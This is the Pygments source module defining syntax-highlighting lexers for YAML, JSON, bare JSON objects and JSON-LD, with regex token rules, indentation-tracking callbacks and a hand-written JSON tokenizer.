"""
    pygments.lexers.data
    ~~~~~~~~~~~~~~~~~~~~

    Lexers for data file formats.

    :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

from pygments.lexer import Lexer, ExtendedRegexLexer, LexerContext, \
    include, bygroups
from pygments.token import Comment, Error, Keyword, Literal, Name, Number, \
    Punctuation, String, Whitespace

__all__ = ['YamlLexer', 'JsonLexer', 'JsonBareObjectLexer', 'JsonLdLexer']


class YamlLexerContext(LexerContext):
    """Indentation context for the YAML lexer."""

    def __init__(self, *args, **kwds):
        super().__init__(*args, **kwds)
        self.indent_stack = []
        self.indent = -1
        self.next_indent = 0
        self.block_scalar_indent = None


class YamlLexer(ExtendedRegexLexer):
    """
    Lexer for YAML, a human-friendly data serialization
    language.
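
    A minimal usage sketch (illustrative; token output abridged):

    .. code-block:: python

        from pygments.lexers import YamlLexer

        for pos, token, value in YamlLexer().get_tokens_unprocessed('key: value\n'):
            print(pos, token, repr(value))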

    .. versionadded:: 0.11
    """

    name = 'YAML'
    url = 'http://yaml.org/'
    aliases = ['yaml']
    filenames = ['*.yaml', '*.yml']
    mimetypes = ['text/x-yaml']

    def something(token_class):
        """Do not produce empty tokens."""
        def callback(lexer, match, context):
            text = match.group()
            if not text:
                return
            yield match.start(), token_class, text
            context.pos = match.end()
        return callback

    def reset_indent(token_class):
        """Reset the indentation levels."""
        def callback(lexer, match, context):
            text = match.group()
            context.indent_stack = []
            context.indent = -1
            context.next_indent = 0
            context.block_scalar_indent = None
            yield match.start(), token_class, text
            context.pos = match.end()
        return callback

    def save_indent(token_class, start=False):
        """Save a possible indentation level."""
        def callback(lexer, match, context):
            text = match.group()
            extra = ''
            if start:
                context.next_indent = len(text)
                if context.next_indent < context.indent:
                    while context.next_indent < context.indent:
                        context.indent = context.indent_stack.pop()
                    if context.next_indent > context.indent:
                        extra = text[context.indent:]
                        text = text[:context.indent]
            else:
                context.next_indent += len(text)
            if text:
                yield match.start(), token_class, text
            if extra:
                yield match.start()+len(text), token_class.Error, extra
            context.pos = match.end()
        return callback

    def set_indent(token_class, implicit=False):
        """Set the previously saved indentation level."""
        def callback(lexer, match, context):
            text = match.group()
            if context.indent < context.next_indent:
                context.indent_stack.append(context.indent)
                context.indent = context.next_indent
            if not implicit:
                context.next_indent += len(text)
            yield match.start(), token_class, text
            context.pos = match.end()
        return callback

    def set_block_scalar_indent(token_class):
        """Set an explicit indentation level for a block scalar."""
        def callback(lexer, match, context):
            text = match.group()
            context.block_scalar_indent = None
            if not text:
                return
            increment = match.group(1)
            if increment:
                current_indent = max(context.indent, 0)
                increment = int(increment)
                context.block_scalar_indent = current_indent + increment
            if text:
                yield match.start(), token_class, text
                context.pos = match.end()
        return callback

    def parse_block_scalar_empty_line(indent_token_class, content_token_class):
        """Process an empty line in a block scalar."""
        def callback(lexer, match, context):
            text = match.group()
            if (context.block_scalar_indent is None or
                    len(text) <= context.block_scalar_indent):
                if text:
                    yield match.start(), indent_token_class, text
            else:
                indentation = text[:context.block_scalar_indent]
                content = text[context.block_scalar_indent:]
                yield match.start(), indent_token_class, indentation
                yield (match.start()+context.block_scalar_indent,
                       content_token_class, content)
            context.pos = match.end()
        return callback

    def parse_block_scalar_indent(token_class):
        """Process indentation spaces in a block scalar."""
        def callback(lexer, match, context):
            text = match.group()
            if context.block_scalar_indent is None:
                if len(text) <= max(context.indent, 0):
                    context.stack.pop()
                    context.stack.pop()
                    return
                context.block_scalar_indent = len(text)
            else:
                if len(text) < context.block_scalar_indent:
                    context.stack.pop()
                    context.stack.pop()
                    return
            if text:
                yield match.start(), token_class, text
                context.pos = match.end()
        return callback

    def parse_plain_scalar_indent(token_class):
        """Process indentation spaces in a plain scalar."""
        def callback(lexer, match, context):
            text = match.group()
            if len(text) <= context.indent:
                context.stack.pop()
                context.stack.pop()
                return
            if text:
                yield match.start(), token_class, text
                context.pos = match.end()
        return callback

    tokens = {
        # the root rules
        'root': [
            # ignored whitespaces
            (r'[ ]+(?=#|$)', Whitespace),
            # line breaks
            (r'\n+', Whitespace),
            # a comment
            (r'#[^\n]*', Comment.Single),
            # the '%YAML' directive
            (r'^%YAML(?=[ ]|$)', reset_indent(Name.Tag), 'yaml-directive'),
            # the %TAG directive
            (r'^%TAG(?=[ ]|$)', reset_indent(Name.Tag), 'tag-directive'),
            # document start and document end indicators
            (r'^(?:---|\.\.\.)(?=[ ]|$)', reset_indent(Name.Namespace),
             'block-line'),
            # indentation spaces
            (r'[ ]*(?!\s|$)', save_indent(Whitespace, start=True),
             ('block-line', 'indentation')),
        ],

        # trailing whitespaces after directives or a block scalar indicator
        'ignored-line': [
            # ignored whitespaces
            (r'[ ]+(?=#|$)', Whitespace),
            # a comment
            (r'#[^\n]*', Comment.Single),
            # line break
            (r'\n', Whitespace, '#pop:2'),
        ],

        # the %YAML directive
        'yaml-directive': [
            # the version number
            (r'([ ]+)([0-9]+\.[0-9]+)',
             bygroups(Whitespace, Number), 'ignored-line'),
        ],

        # the %TAG directive
        'tag-directive': [
            # a tag handle and the corresponding prefix
            (r'([ ]+)(!|![\w-]*!)'
             r'([ ]+)(!|!?[\w;/?:@&=+$,.!~*\'()\[\]%-]+)',
             bygroups(Whitespace, Keyword.Type, Whitespace, Keyword.Type),
             'ignored-line'),
        ],

        # block scalar indicators and indentation spaces
        'indentation': [
            # trailing whitespaces are ignored
            (r'[ ]*$', something(Whitespace), '#pop:2'),
            # whitespaces preceding block collection indicators
            (r'[ ]+(?=[?:-](?:[ ]|$))', save_indent(Whitespace)),
            # block collection indicators
            (r'[?:-](?=[ ]|$)', set_indent(Punctuation.Indicator)),
            # the beginning of a block line
            (r'[ ]*', save_indent(Whitespace), '#pop'),
        ],

        # an indented line in the block context
        'block-line': [
            # the line end
            (r'[ ]*(?=#|$)', something(Whitespace), '#pop'),
            # whitespaces separating tokens
            (r'[ ]+', Whitespace),
            # key with colon
            (r'''([^#,?\[\]{}"'\n]+)(:)(?=[ ]|$)''',
             bygroups(Name.Tag, set_indent(Punctuation, implicit=True))),
            # tags, anchors and aliases
            include('descriptors'),
            # block collections and scalars
            include('block-nodes'),
            # flow collections and quoted scalars
            include('flow-nodes'),
            # a plain scalar
            (r'(?=[^\s?:,\[\]{}#&*!|>\'"%@`-]|[?:-]\S)',
             something(Name.Variable),
             'plain-scalar-in-block-context'),
        ],

        # tags, anchors, aliases
        'descriptors': [
            # a full-form tag
            (r'!<[\w#;/?:@&=+$,.!~*\'()\[\]%-]+>', Keyword.Type),
            # a tag in the form '!', '!suffix' or '!handle!suffix'
            (r'!(?:[\w-]+!)?'
             r'[\w#;/?:@&=+$,.!~*\'()\[\]%-]*', Keyword.Type),
            # an anchor
            (r'&[\w-]+', Name.Label),
            # an alias
            (r'\*[\w-]+', Name.Variable),
        ],

        # block collections and scalars
        'block-nodes': [
            # implicit key
            (r':(?=[ ]|$)', set_indent(Punctuation.Indicator, implicit=True)),
            # literal and folded scalars
            (r'[|>]', Punctuation.Indicator,
             ('block-scalar-content', 'block-scalar-header')),
        ],

        # flow collections and quoted scalars
        'flow-nodes': [
            # a flow sequence
            (r'\[', Punctuation.Indicator, 'flow-sequence'),
            # a flow mapping
            (r'\{', Punctuation.Indicator, 'flow-mapping'),
            # a single-quoted scalar
            (r'\'', String, 'single-quoted-scalar'),
            # a double-quoted scalar
            (r'\"', String, 'double-quoted-scalar'),
        ],

        # the content of a flow collection
        'flow-collection': [
            # whitespaces
            (r'[ ]+', Whitespace),
            # line breaks
            (r'\n+', Whitespace),
            # a comment
            (r'#[^\n]*', Comment.Single),
            # simple indicators
            (r'[?:,]', Punctuation.Indicator),
            # tags, anchors and aliases
            include('descriptors'),
            # nested collections and quoted scalars
            include('flow-nodes'),
            # a plain scalar
            (r'(?=[^\s?:,\[\]{}#&*!|>\'"%@`])',
             something(Name.Variable),
             'plain-scalar-in-flow-context'),
        ],

        # a flow sequence indicated by '[' and ']'
        'flow-sequence': [
            # include flow collection rules
            include('flow-collection'),
            # the closing indicator
            (r'\]', Punctuation.Indicator, '#pop'),
        ],

        # a flow mapping indicated by '{' and '}'
        'flow-mapping': [
            # key with colon
            (r'''([^,:?\[\]{}"'\n]+)(:)(?=[ ]|$)''',
             bygroups(Name.Tag, Punctuation)),
            # include flow collection rules
            include('flow-collection'),
            # the closing indicator
            (r'\}', Punctuation.Indicator, '#pop'),
        ],

        # block scalar lines
        'block-scalar-content': [
            # line break
            (r'\n', Whitespace),
            # empty line
            (r'^[ ]+$',
             parse_block_scalar_empty_line(Whitespace, Name.Constant)),
            # indentation spaces (we may leave the state here)
            (r'^[ ]*', parse_block_scalar_indent(Whitespace)),
            # line content
            (r'[\S\t ]+', Name.Constant),
        ],

        # the content of a literal or folded scalar
        'block-scalar-header': [
            # indentation indicator followed by chomping flag
            (r'([1-9])?[+-]?(?=[ ]|$)',
             set_block_scalar_indent(Punctuation.Indicator),
             'ignored-line'),
            # chomping flag followed by indentation indicator
            (r'[+-]?([1-9])?(?=[ ]|$)',
             set_block_scalar_indent(Punctuation.Indicator),
             'ignored-line'),
        ],

        # ignored and regular whitespaces in quoted scalars
        'quoted-scalar-whitespaces': [
            # leading and trailing whitespaces are ignored
            (r'^[ ]+', Whitespace),
            (r'[ ]+$', Whitespace),
            # line breaks are ignored
            (r'\n+', Whitespace),
            # other whitespaces are a part of the value
            (r'[ ]+', Name.Variable),
        ],

        # single-quoted scalars
        'single-quoted-scalar': [
            # include whitespace and line break rules
            include('quoted-scalar-whitespaces'),
            # escaping of the quote character
            (r'\'\'', String.Escape),
            # regular non-whitespace characters
            (r'[^\s\']+', String),
            # the closing quote
            (r'\'', String, '#pop'),
        ],

        # double-quoted scalars
        'double-quoted-scalar': [
            # include whitespace and line break rules
            include('quoted-scalar-whitespaces'),
            # escaping of special characters
            (r'\\[0abt\tn\nvfre "\\N_LP]', String),
            # escape codes
            (r'\\(?:x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8})',
             String.Escape),
            # regular non-whitespace characters
            (r'[^\s"\\]+', String),
            # the closing quote
            (r'"', String, '#pop'),
        ],

        # the beginning of a new line while scanning a plain scalar
        'plain-scalar-in-block-context-new-line': [
            # empty lines
            (r'^[ ]+$', Whitespace),
            # line breaks
            (r'\n+', Whitespace),
            # document start and document end indicators
            (r'^(?=---|\.\.\.)', something(Name.Namespace), '#pop:3'),
            # indentation spaces (we may leave the block line state here)
            (r'^[ ]*', parse_plain_scalar_indent(Whitespace), '#pop'),
        ],

        # a plain scalar in the block context
        'plain-scalar-in-block-context': [
            # the scalar ends with the ':' indicator
            (r'[ ]*(?=:[ ]|:$)', something(Whitespace), '#pop'),
            # the scalar ends with whitespaces followed by a comment
            (r'[ ]+(?=#)', Whitespace, '#pop'),
            # trailing whitespaces are ignored
            (r'[ ]+$', Whitespace),
            # line breaks are ignored
            (r'\n+', Whitespace, 'plain-scalar-in-block-context-new-line'),
            # other whitespaces are a part of the value
            (r'[ ]+', Literal.Scalar.Plain),
            # regular non-whitespace characters
            (r'(?::(?!\s)|[^\s:])+', Literal.Scalar.Plain),
        ],

        # a plain scalar in the flow context
        'plain-scalar-in-flow-context': [
            # the scalar ends with an indicator character
            (r'[ ]*(?=[,:?\[\]{}])', something(Whitespace), '#pop'),
            # the scalar ends with a comment
            (r'[ ]+(?=#)', Whitespace, '#pop'),
            # leading and trailing whitespaces are ignored
            (r'^[ ]+', Whitespace),
            (r'[ ]+$', Whitespace),
            # line breaks are ignored
            (r'\n+', Whitespace),
            # other whitespaces are a part of the value
            (r'[ ]+', Name.Variable),
            # regular non-whitespace characters
            (r'[^\s,:?\[\]{}]+', Name.Variable),
        ],

    }

    def get_tokens_unprocessed(self, text=None, context=None):
        if context is None:
            context = YamlLexerContext(text, 0)
        return super().get_tokens_unprocessed(text, context)


class JsonLexer(Lexer):
    """
    For JSON data structures.

    JavaScript-style comments are supported (like ``/* */`` and ``//``),
    though comments are not part of the JSON specification.
    This allows users to highlight JSON as it is used in the wild.

    No validation is performed on the input JSON document.
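
    A short usage sketch (illustrative; the comment in the input is
    highlighted rather than rejected):

    .. code-block:: python

        from pygments.lexers import JsonLexer

        text = '{"name": "value"} /* lexes, despite not being valid JSON */'
        for start, token, value in JsonLexer().get_tokens_unprocessed(text):
            print(start, token, repr(value))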

    .. versionadded:: 1.5
    """

    name = 'JSON'
    url = 'https://www.json.org'
    aliases = ['json', 'json-object']
    filenames = ['*.json', '*.jsonl', '*.ndjson', 'Pipfile.lock']
    mimetypes = ['application/json', 'application/json-object', 'application/x-ndjson', 'application/jsonl', 'application/json-seq']

    # No validation of integers, floats, or constants is done.
    # As long as the characters are members of the following
    # sets, the token will be considered valid. For example,
    #
    #     "--1--" is parsed as an integer
    #     "1...eee" is parsed as a float
    #     "trustful" is parsed as a constant
    #
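    # An illustrative trace of that leniency (example added for
    # clarity; the token type is shown in its repr form):
    #
    #     >>> list(JsonLexer().get_tokens_unprocessed('--1--'))
    #     [(0, Token.Literal.Number.Integer, '--1--')]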
    integers = set('-0123456789')
    floats = set('.eE+')
    constants = set('truefalsenull')  # true|false|null
    hexadecimals = set('0123456789abcdefABCDEF')
    punctuations = set('{}[],')
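    # the four insignificant whitespace characters JSON allows:
    # space, line feed, carriage return, and horizontal tab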
    whitespaces = {'\u0020', '\u000a', '\u000d', '\u0009'}

    def get_tokens_unprocessed(self, text):
        """Parse JSON data."""

        in_string = False
        in_escape = False
        in_unicode_escape = 0
        in_whitespace = False
        in_constant = False
        in_number = False
        in_float = False
        in_punctuation = False
        in_comment_single = False
        in_comment_multiline = False
        expecting_second_comment_opener = False  # // or /*
        expecting_second_comment_closer = False  # */

        start = 0

        # The queue is used to store data that may need to be tokenized
        # differently based on what follows. In particular, JSON object
        # keys are tokenized differently than string values, but cannot
        # be distinguished until punctuation is encountered outside the
        # string.
        #
        # A ":" character after the string indicates that the string is
        # an object key; any other character indicates the string is a
        # regular string value.
        #
        # The queue holds tuples that contain the following data:
        #
        #     (start_index, token_type, text)
        #
        # By default the token type of text in double quotes is
        # String.Double. The token type will be replaced if a colon
        # is encountered after the string closes.
        #
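        # For example, in '{"a": 1}' the key string '"a"' is queued as
        # String.Double and re-emitted as Name.Tag once the ':' is
        # seen, while a string in value position is flushed unchanged
        # when the following ',' or '}' arrives.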
        queue = []

        for stop, character in enumerate(text):
            if in_string:
                if in_unicode_escape:
                    if character in self.hexadecimals:
                        in_unicode_escape -= 1
                        if not in_unicode_escape:
                            in_escape = False
                    else:
                        in_unicode_escape = 0
                        in_escape = False

                elif in_escape:
                    if character == 'u':
                        in_unicode_escape = 4
                    else:
                        in_escape = False

                elif character == '\\':
                    in_escape = True

                elif character == '"':
                    queue.append((start, String.Double, text[start:stop + 1]))
                    in_string = False
                    in_escape = False
                    in_unicode_escape = 0

                continue

            elif in_whitespace:
                if character in self.whitespaces:
                    continue

                if queue:
                    queue.append((start, Whitespace, text[start:stop]))
                else:
                    yield start, Whitespace, text[start:stop]
                in_whitespace = False
                # Fall through so the new character can be evaluated.

            elif in_constant:
                if character in self.constants:
                    continue

                yield start, Keyword.Constant, text[start:stop]
                in_constant = False
                # Fall through so the new character can be evaluated.

            elif in_number:
                if character in self.integers:
                    continue
                elif character in self.floats:
                    in_float = True
                    continue

                if in_float:
                    yield start, Number.Float, text[start:stop]
                else:
                    yield start, Number.Integer, text[start:stop]
                in_number = False
                in_float = False
                # Fall through so the new character can be evaluated.

            elif in_punctuation:
                if character in self.punctuations:
                    continue

                yield start, Punctuation, text[start:stop]
                in_punctuation = False
                # Fall through so the new character can be evaluated.

            elif in_comment_single:
                if character != '\n':
                    continue

                if queue:
                    queue.append((start, Comment.Single, text[start:stop]))
                else:
                    yield start, Comment.Single, text[start:stop]

                in_comment_single = False
                # Fall through so the new character can be evaluated.

            elif in_comment_multiline:
                if character == '*':
                    expecting_second_comment_closer = True
                elif expecting_second_comment_closer:
                    expecting_second_comment_closer = False
                    if character == '/':
                        if queue:
                            queue.append((start, Comment.Multiline, text[start:stop + 1]))
                        else:
                            yield start, Comment.Multiline, text[start:stop + 1]

                        in_comment_multiline = False

                continue

            elif expecting_second_comment_opener:
                expecting_second_comment_opener = False
                if character == '/':
                    in_comment_single = True
                    continue
                elif character == '*':
                    in_comment_multiline = True
                    continue

                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                yield start, Error, text[start:stop]
                # Fall through so the new character can be evaluated.

            start = stop

            if character == '"':
                in_string = True

            elif character in self.whitespaces:
                in_whitespace = True

            elif character in {'f', 'n', 't'}:  # The first letters of true|false|null
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                in_constant = True

            elif character in self.integers:
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                in_number = True

            elif character == ':':
                # Yield from the queue. Replace string token types.
                for _start, _token, _text in queue:
                    # There can be only three types of tokens before a ':':
                    # Whitespace, Comment, or a quoted string.
                    #
                    # If it's a quoted string we emit Name.Tag.
                    # Otherwise, we yield the original token.
                    #
                    # In all other cases this would be invalid JSON,
                    # but this is not a validating JSON lexer, so it's OK.
                    if _token is String.Double:
                        yield _start, Name.Tag, _text
                    else:
                        yield _start, _token, _text
                queue.clear()

                in_punctuation = True

            elif character in self.punctuations:
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                in_punctuation = True

            elif character == '/':
                # This is the beginning of a comment.
                expecting_second_comment_opener = True

            else:
                # Exhaust the queue. Accept the existing token types.
                yield from queue
                queue.clear()

                yield start, Error, character

        # Yield any remaining text.
        yield from queue
        if in_string:
            yield start, Error, text[start:]
        elif in_float:
            yield start, Number.Float, text[start:]
        elif in_number:
            yield start, Number.Integer, text[start:]
        elif in_constant:
            yield start, Keyword.Constant, text[start:]
        elif in_whitespace:
            yield start, Whitespace, text[start:]
        elif in_punctuation:
            yield start, Punctuation, text[start:]
        elif in_comment_single:
            yield start, Comment.Single, text[start:]
        elif in_comment_multiline:
            yield start, Error, text[start:]
        elif expecting_second_comment_opener:
            yield start, Error, text[start:]


class JsonBareObjectLexer(JsonLexer):
    """
    For JSON data structures (with missing object curly braces).

    .. versionadded:: 2.2

    .. deprecated:: 2.8.0

       Behaves the same as `JsonLexer` now.
    """

    name = 'JSONBareObject'
    aliases = []
    filenames = []
    mimetypes = []


class JsonLdLexer(JsonLexer):
    """
    For JSON-LD linked data.
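
    Object keys matching JSON-LD keywords such as ``"@context"`` or
    ``"@id"`` are emitted as ``Name.Decorator`` instead of ``Name.Tag``.
    A brief sketch (illustrative):

    .. code-block:: python

        from pygments.lexers import JsonLdLexer

        # the '"@id"' key below is tokenized as Name.Decorator
        tokens = list(JsonLdLexer().get_tokens_unprocessed('{"@id": "x"}'))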

    .. versionadded:: 2.0
    """

    name = 'JSON-LD'
    url = 'https://json-ld.org/'
    aliases = ['jsonld', 'json-ld']
    filenames = ['*.jsonld']
    mimetypes = ['application/ld+json']

    json_ld_keywords = {
        '"@%s"' % keyword
        for keyword in (
            'base',
            'container',
            'context',
            'direction',
            'graph',
            'id',
            'import',
            'included',
            'index',
            'json',
            'language',
            'list',
            'nest',
            'none',
            'prefix',
            'propagate',
            'protected',
            'reverse',
            'set',
            'type',
            'value',
            'version',
            'vocab',
        )
    }

    def get_tokens_unprocessed(self, text):
        for start, token, value in super().get_tokens_unprocessed(text):
            if token is Name.Tag and value in self.json_ld_keywords:
                yield start, Name.Decorator, value
            else:
                yield start, token, value
